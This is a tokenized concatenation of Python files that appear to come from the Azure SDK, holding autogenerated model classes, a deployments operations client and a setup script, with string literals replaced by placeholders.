<s> from . resource import Resource <EOL> class NetworkSecurityGroup ( Resource ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT:type>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:location>' : { '<STR_LIT:key>' : '<STR_LIT:location>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , id = None , location = None , tags = None , security_rules = None , default_security_rules = None , network_interfaces = None , subnets = None , resource_guid = None , provisioning_state = None , etag = None ) : <EOL> super ( NetworkSecurityGroup , self ) . __init__ ( id = id , location = location , tags = tags ) <EOL> self . security_rules = security_rules <EOL> self . default_security_rules = default_security_rules <EOL> self . network_interfaces = network_interfaces <EOL> self . subnets = subnets <EOL> self . resource_guid = resource_guid <EOL> self . provisioning_state = provisioning_state <EOL> self . etag = etag </s>
<s> from . sub_resource import SubResource <EOL> class VpnClientRootCertificate ( SubResource ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , id = None , public_cert_data = None , provisioning_state = None , name = None , etag = None ) : <EOL> super ( VpnClientRootCertificate , self ) . __init__ ( id = id ) <EOL> self . public_cert_data = public_cert_data <EOL> self . provisioning_state = provisioning_state <EOL> self . name = name <EOL> self . etag = etag </s>
<s> from msrest . serialization import Model <EOL> class BaiduCredential ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , properties = None ) : <EOL> self . properties = properties </s>
<s> VERSION = "<STR_LIT>" </s>
<s> from msrest . serialization import Model <EOL> class GenericResourceFilter ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , resource_type = None , tagname = None , tagvalue = None ) : <EOL> self . resource_type = resource_type <EOL> self . tagname = tagname <EOL> self . tagvalue = tagvalue </s>
<s> from msrest . serialization import Model <EOL> class DeploymentValidateResult ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:error>' : { '<STR_LIT:key>' : '<STR_LIT:error>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , error = None , properties = None ) : <EOL> self . error = error <EOL> self . properties = properties </s>
<s> from msrest . pipeline import ClientRawResponse <EOL> from msrestazure . azure_exceptions import CloudError <EOL> from msrestazure . azure_operation import AzureOperationPoller <EOL> import uuid <EOL> from . . import models <EOL> class DeploymentsOperations ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , config , serializer , deserializer ) : <EOL> self . _client = client <EOL> self . _serialize = serializer <EOL> self . _deserialize = deserializer <EOL> self . config = config <EOL> def delete ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> def long_running_send ( ) : <EOL> request = self . _client . delete ( url , query_parameters ) <EOL> return self . _client . send ( request , header_parameters , ** operation_config ) <EOL> def get_long_running_status ( status_link , headers = { } ) : <EOL> request = self . _client . get ( status_link ) <EOL> request . headers . update ( headers ) <EOL> return self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> def get_long_running_output ( response ) : <EOL> if response . status_code not in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( None , response ) <EOL> return client_raw_response <EOL> if raw : <EOL> response = long_running_send ( ) <EOL> return get_long_running_output ( response ) <EOL> long_running_operation_timeout = operation_config . get ( <EOL> '<STR_LIT>' , <EOL> self . config . long_running_operation_timeout ) <EOL> return AzureOperationPoller ( <EOL> long_running_send , get_long_running_output , <EOL> get_long_running_status , long_running_operation_timeout ) <EOL> def check_existence ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . head ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = ( response . status_code == <NUM_LIT> ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def create_or_update ( <EOL> self , resource_group_name , deployment_name , properties = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> parameters = models . Deployment ( properties = properties ) <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> body_content = self . _serialize . body ( parameters , '<STR_LIT>' ) <EOL> def long_running_send ( ) : <EOL> request = self . _client . put ( url , query_parameters ) <EOL> return self . _client . send ( <EOL> request , header_parameters , body_content , ** operation_config ) <EOL> def get_long_running_status ( status_link , headers = { } ) : <EOL> request = self . _client . get ( status_link ) <EOL> request . headers . update ( headers ) <EOL> return self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> def get_long_running_output ( response ) : <EOL> if response . status_code not in [ <NUM_LIT:200> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if response . status_code == <NUM_LIT> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> if raw : <EOL> response = long_running_send ( ) <EOL> return get_long_running_output ( response ) <EOL> long_running_operation_timeout = operation_config . get ( <EOL> '<STR_LIT>' , <EOL> self . config . long_running_operation_timeout ) <EOL> return AzureOperationPoller ( <EOL> long_running_send , get_long_running_output , <EOL> get_long_running_status , long_running_operation_timeout ) <EOL> def get ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . get ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def cancel ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( None , response ) <EOL> return client_raw_response <EOL> def validate ( <EOL> self , resource_group_name , deployment_name , properties = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> parameters = models . Deployment ( properties = properties ) <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> body_content = self . _serialize . body ( parameters , '<STR_LIT>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( <EOL> request , header_parameters , body_content , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if response . status_code == <NUM_LIT> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def export_template ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def list ( <EOL> self , resource_group_name , filter = None , top = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> def internal_paging ( next_link = None , raw = False ) : <EOL> if not next_link : <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> if filter is not None : <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , filter , '<STR_LIT:str>' ) <EOL> if top is not None : <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , top , '<STR_LIT:int>' ) <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> else : <EOL> url = next_link <EOL> query_parameters = { } <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . get ( url , query_parameters ) <EOL> response = self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> return response <EOL> deserialized = models . DeploymentExtendedPaged ( internal_paging , self . _deserialize . dependencies ) <EOL> if raw : <EOL> header_dict = { } <EOL> client_raw_response = models . DeploymentExtendedPaged ( internal_paging , self . _deserialize . dependencies , header_dict ) <EOL> return client_raw_response <EOL> return deserialized </s>
<s> from msrest . serialization import Model <EOL> class HttpRequest ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:body>' : { '<STR_LIT:key>' : '<STR_LIT:body>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , authentication = None , uri = None , method = None , body = None , headers = None ) : <EOL> self . authentication = authentication <EOL> self . uri = uri <EOL> self . method = method <EOL> self . body = body <EOL> self . headers = headers </s>
<s> from msrest . serialization import Model <EOL> class Sku ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , name = None ) : <EOL> self . name = name </s>
<s> from setuptools import setup <EOL> try : <EOL> import azure <EOL> try : <EOL> ver = azure . __version__ <EOL> raise Exception ( <EOL> '<STR_LIT>' . format ( ver ) + <EOL> '<STR_LIT>' <EOL> ) <EOL> except AttributeError : <EOL> pass <EOL> except ImportError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from msrest . serialization import Model <EOL> class CorsSettings ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , allowed_origins = None ) : <EOL> self . allowed_origins = allowed_origins </s>
<s> from . resource import Resource <EOL> class HostNameBinding ( Resource ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:location>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:location>' : { '<STR_LIT:key>' : '<STR_LIT:location>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , location , id = None , name = None , kind = None , type = None , tags = None , host_name_binding_name = None , site_name = None , domain_id = None , azure_resource_name = None , azure_resource_type = None , custom_host_name_dns_record_type = None , host_name_type = None ) : <EOL> super ( HostNameBinding , self ) . __init__ ( id = id , name = name , kind = kind , location = location , type = type , tags = tags ) <EOL> self . host_name_binding_name = host_name_binding_name <EOL> self . site_name = site_name <EOL> self . domain_id = domain_id <EOL> self . azure_resource_name = azure_resource_name <EOL> self . azure_resource_type = azure_resource_type <EOL> self . custom_host_name_dns_record_type = custom_host_name_dns_record_type <EOL> self . host_name_type = host_name_type </s>
<s> from msrest . serialization import Model <EOL> class ResourceMetric ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , name = None , unit = None , time_grain = None , start_time = None , end_time = None , resource_id = None , metric_values = None , properties = None ) : <EOL> self . name = name <EOL> self . unit = unit <EOL> self . time_grain = time_grain <EOL> self . start_time = start_time <EOL> self . end_time = end_time <EOL> self . resource_id = resource_id <EOL> self . metric_values = metric_values <EOL> self . properties = properties </s>
<s> from msrest . serialization import Model <EOL> class SlotConfigNames ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , connection_string_names = None , app_setting_names = None ) : <EOL> self . connection_string_names = connection_string_names <EOL> self . app_setting_names = app_setting_names </s>
